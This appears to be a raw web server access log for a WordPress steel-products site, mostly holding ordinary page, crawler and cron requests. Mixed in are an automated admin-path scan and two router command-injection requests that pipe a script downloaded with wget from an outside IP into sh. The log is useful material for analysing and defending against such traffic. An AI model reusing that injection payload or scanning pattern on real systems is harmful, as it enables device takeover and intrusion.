121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /manage_access HTTP/1.1" 499 0 "http://www.cqqizhou.com/manage_access" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /admin_niao HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin_niao" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /editubb HTTP/1.1" 499 0 "http://www.cqqizhou.com/editubb" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /admin/webeditor HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin/webeditor" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /shopxp_admin HTTP/1.1" 499 0 "http://www.cqqizhou.com/shopxp_admin" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /SystemAdmin HTTP/1.1" 499 0 "http://www.cqqizhou.com/SystemAdmin" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /sitemanager HTTP/1.1" 499 0 "http://www.cqqizhou.com/sitemanager" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /sitemanage HTTP/1.1" 499 0 "http://www.cqqizhou.com/sitemanage" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /HX_admin HTTP/1.1" 499 0 "http://www.cqqizhou.com/HX_admin" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /phpMyAdmin-3.4.2-all-languages HTTP/1.1" 499 0 "http://www.cqqizhou.com/phpMyAdmin-3.4.2-all-languages" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /admin/do HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /siteadmin HTTP/1.1" 499 0 "http://www.cqqizhou.com/siteadmin" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /szwyadmin HTTP/1.1" 499 0 "http://www.cqqizhou.com/szwyadmin" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /admin_file HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin_file" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /admin_manage_access HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin_manage_access" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /help HTTP/1.1" 499 0 "http://www.cqqizhou.com/help" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /qdmins HTTP/1.1" 499 0 "http://www.cqqizhou.com/qdmins" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /administration HTTP/1.1" 499 0 "http://www.cqqizhou.com/administration" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /qdmin HTTP/1.1" 499 0 "http://www.cqqizhou.com/qdmin" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /ctrladmin HTTP/1.1" 499 0 "http://www.cqqizhou.com/ctrladmin" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /admin_access HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin_access" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /login_from_admin HTTP/1.1" 499 0 "http://www.cqqizhou.com/login_from_admin" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /login_system HTTP/1.1" 499 0 "http://www.cqqizhou.com/login_system" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /include/dialoguser HTTP/1.1" 499 0 "http://www.cqqizhou.com/include/dialoguser" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /login_from_manage HTTP/1.1" 499 0 "http://www.cqqizhou.com/login_from_manage" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /login_manage HTTP/1.1" 499 0 "http://www.cqqizhou.com/login_manage" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /m HTTP/1.1" 499 0 "http://www.cqqizhou.com/m" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /login_manager HTTP/1.1" 499 0 "http://www.cqqizhou.com/login_manager" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /login_from_system HTTP/1.1" 499 0 "http://www.cqqizhou.com/login_from_system" "Go-http-client/1.1"
121.42.253.62 - - [04/Sep/2025:17:32:19 +0800] "HEAD /ubbcode HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
47.109.44.73 - - [04/Sep/2025:17:32:27 +0800] "GET /contacts/ HTTP/1.1" 200 21496 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:32:28 +0800] "GET /bug HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:32:28 +0800] "GET /bug/ HTTP/1.1" 200 12812 "http://www.cqqizhou.com/bug" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:33:01 +0800] "GET /wp-includes/js/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.253.62 - - [04/Sep/2025:17:33:01 +0800] "GET /wp-content/themes/qizhou/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:33:03 +0800] "POST /wp-cron.php?doing_wp_cron=1756978382.9711310863494873046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
47.108.117.45 - - [04/Sep/2025:17:33:03 +0800] "GET /ask/ HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.252.229 - - [04/Sep/2025:17:33:03 +0800] "GET /wp-json/oembed/ HTTP/1.1" 404 154 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.253.62 - - [04/Sep/2025:17:33:09 +0800] "GET /portfolio-category/cold-rolled-coil/ HTTP/1.1" 200 20900 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:33:09 +0800] "GET /wp-content/plugins/wp-rocket/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:33:23 +0800] "GET /services HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:33:23 +0800] "GET /services/ HTTP/1.1" 200 25528 "http://www.cqqizhou.com/services" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:33:28 +0800] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.31.152 - - [04/Sep/2025:17:33:28 +0800] "GET /wp-json/ HTTP/1.1" 200 19172 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:34:09 +0800] "GET /wp-content/ HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:34:15 +0800] "GET /wp-content/themes/qizhou/ HTTP/1.1" 500 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:34:16 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/js/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:34:20 +0800] "GET /wp-content/plugins/elementor-pro/assets/js/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
156.244.27.246 - - [04/Sep/2025:17:34:20 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [04/Sep/2025:17:34:21 +0800] "POST /wp-cron.php?doing_wp_cron=1756978461.5112359523773193359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.42.253.62 - - [04/Sep/2025:17:34:26 +0800] "GET /wp-content/plugins/elementor-pro/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.253.62 - - [04/Sep/2025:17:34:27 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:34:39 +0800] "GET /portfolio/hot-dip-galvanized-coil/ HTTP/1.1" 200 22257 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.54.65 - - [04/Sep/2025:17:34:43 +0800] "GET /wp-content/plugins/elementor/assets/lib/animations/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:35:06 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
156.244.27.246 - - [04/Sep/2025:17:35:13 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [04/Sep/2025:17:35:14 +0800] "POST /wp-cron.php?doing_wp_cron=1756978514.2519791126251220703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
47.109.31.152 - - [04/Sep/2025:17:35:24 +0800] "GET /2164/ HTTP/1.1" 200 23705 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
120.138.19.65 - - [04/Sep/2025:17:35:45 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
47.109.31.152 - - [04/Sep/2025:17:36:07 +0800] "GET /wp-content/uploads/elementor/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:36:16 +0800] "GET /wp-content/plugins/elementor/assets/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:36:33 +0800] "GET /wp-content/cache/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:37:13 +0800] "GET /wp-content/plugins/elementor/assets/js/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:37:20 +0800] "POST /wp-cron.php?doing_wp_cron=1756978640.8287110328674316406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.42.252.229 - - [04/Sep/2025:17:37:20 +0800] "GET /comments/ HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:37:26 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:37:27 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:37:27 +0800] "GET /wp-content/cache/min/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:37:35 +0800] "GET /wp-includes/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:37:47 +0800] "GET /wp-content/cache/min/1/wp-content/themes/qizhou/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.252.229 - - [04/Sep/2025:17:37:53 +0800] "GET /wp-content/plugins/ HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:37:55 +0800] "GET /wp-includes/js/jquery/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:37:56 +0800] "POST /wp-cron.php?doing_wp_cron=1756978676.5559530258178710937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.42.253.62 - - [04/Sep/2025:17:37:56 +0800] "GET /wp-json/ HTTP/1.1" 200 19172 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:38:04 +0800] "GET /wp-json/oembed/1.0/ HTTP/1.1" 200 543 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.54.65 - - [04/Sep/2025:17:38:10 +0800] "GET /services/ HTTP/1.1" 200 25528 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:38:12 +0800] "GET /portfolio/duplex-stainless-steel/ HTTP/1.1" 200 22101 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.253.62 - - [04/Sep/2025:17:38:12 +0800] "GET /wp-content/themes/ HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:38:15 +0800] "GET /wp-content/plugins/elementor/assets/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:38:31 +0800] "POST /wp-cron.php?doing_wp_cron=1756978711.7355730533599853515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
47.108.117.45 - - [04/Sep/2025:17:38:31 +0800] "GET /ask/data/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:38:31 +0800] "GET /data/ HTTP/1.1" 200 11831 "http://www.cqqizhou.com/ask/data/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.54.65 - - [04/Sep/2025:17:38:47 +0800] "GET /portfolio-category/hot-dip-galvanized-coil/ HTTP/1.1" 200 20880 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:38:50 +0800] "GET /wp-content/plugins/elementor-pro/assets/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.54.65 - - [04/Sep/2025:17:38:56 +0800] "GET /wp-content/plugins/wp-rocket/assets/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:38:56 +0800] "GET /wp-content/uploads/elementor/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:39:06 +0800] "GET /wp-content/plugins/elementor-pro/assets/js/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:39:07 +0800] "POST /wp-cron.php?doing_wp_cron=1756978747.0360159873962402343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.42.236.230 - - [04/Sep/2025:17:39:07 +0800] "GET /portfolio-category/ HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:39:14 +0800] "GET /wp-content/uploads/elementor/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:39:34 +0800] "GET /ask/data/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:39:34 +0800] "GET /data/ HTTP/1.1" 200 11831 "http://www.cqqizhou.com/ask/data/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:39:43 +0800] "GET /wp-includes/js/jquery/ui/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:39:44 +0800] "GET /club/ HTTP/1.1" 200 13062 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:39:50 +0800] "GET /portfolio/hot-dip-galvanized-coil/ HTTP/1.1" 200 22257 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:40:31 +0800] "GET /wp-content/plugins/elementor/assets/css/conditionals/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:40:32 +0800] "GET /wp-content/plugins/elementor/assets/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:40:40 +0800] "POST /wp-cron.php?doing_wp_cron=1756978840.3540360927581787109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.42.249.16 - - [04/Sep/2025:17:40:40 +0800] "GET /portfolio-tag/ HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.253.62 - - [04/Sep/2025:17:40:46 +0800] "GET /portfolio-category/remaining-rolls/ HTTP/1.1" 200 20832 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:40:51 +0800] "POST /wp-cron.php?doing_wp_cron=1756978851.8817820549011230468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
60.13.138.10 - - [04/Sep/2025:17:40:52 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
43.159.128.247 - - [04/Sep/2025:17:41:07 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.159.128.247 - - [04/Sep/2025:17:41:09 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
121.42.252.229 - - [04/Sep/2025:17:41:09 +0800] "GET /portfolio/%e5%86%b7%e8%bd%a7%e6%9d%bf/ HTTP/1.1" 200 22092 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:41:14 +0800] "GET /wp-content/plugins/wp-rocket/assets/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:41:49 +0800] "POST /wp-cron.php?doing_wp_cron=1756978909.0199220180511474609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
222.94.32.217 - - [04/Sep/2025:17:41:49 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
47.109.54.65 - - [04/Sep/2025:17:42:01 +0800] "GET /wp-content/uploads/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:42:09 +0800] "GET /wp-content/uploads/elementor/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:42:14 +0800] "GET /wp-content/plugins/wp-rocket/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:42:15 +0800] "GET /policy/ HTTP/1.1" 200 23548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:42:23 +0800] "GET /services HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:42:23 +0800] "GET /services/ HTTP/1.1" 200 25528 "http://www.cqqizhou.com/services" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:42:52 +0800] "POST /wp-cron.php?doing_wp_cron=1756978972.3872849941253662109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
47.109.44.73 - - [04/Sep/2025:17:42:52 +0800] "GET /?s= HTTP/1.1" 200 19545 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:43:05 +0800] "GET /process/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:43:05 +0800] "GET /services/processing/ HTTP/1.1" 200 22903 "http://cqqizhou.com/process/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:43:28 +0800] "GET /2159/ HTTP/1.1" 200 28935 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
149.50.103.48 - - [04/Sep/2025:17:43:38 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
121.42.236.230 - - [04/Sep/2025:17:43:45 +0800] "GET /2159/ HTTP/1.1" 200 28935 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:44:18 +0800] "POST /wp-cron.php?doing_wp_cron=1756979058.1404480934143066406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
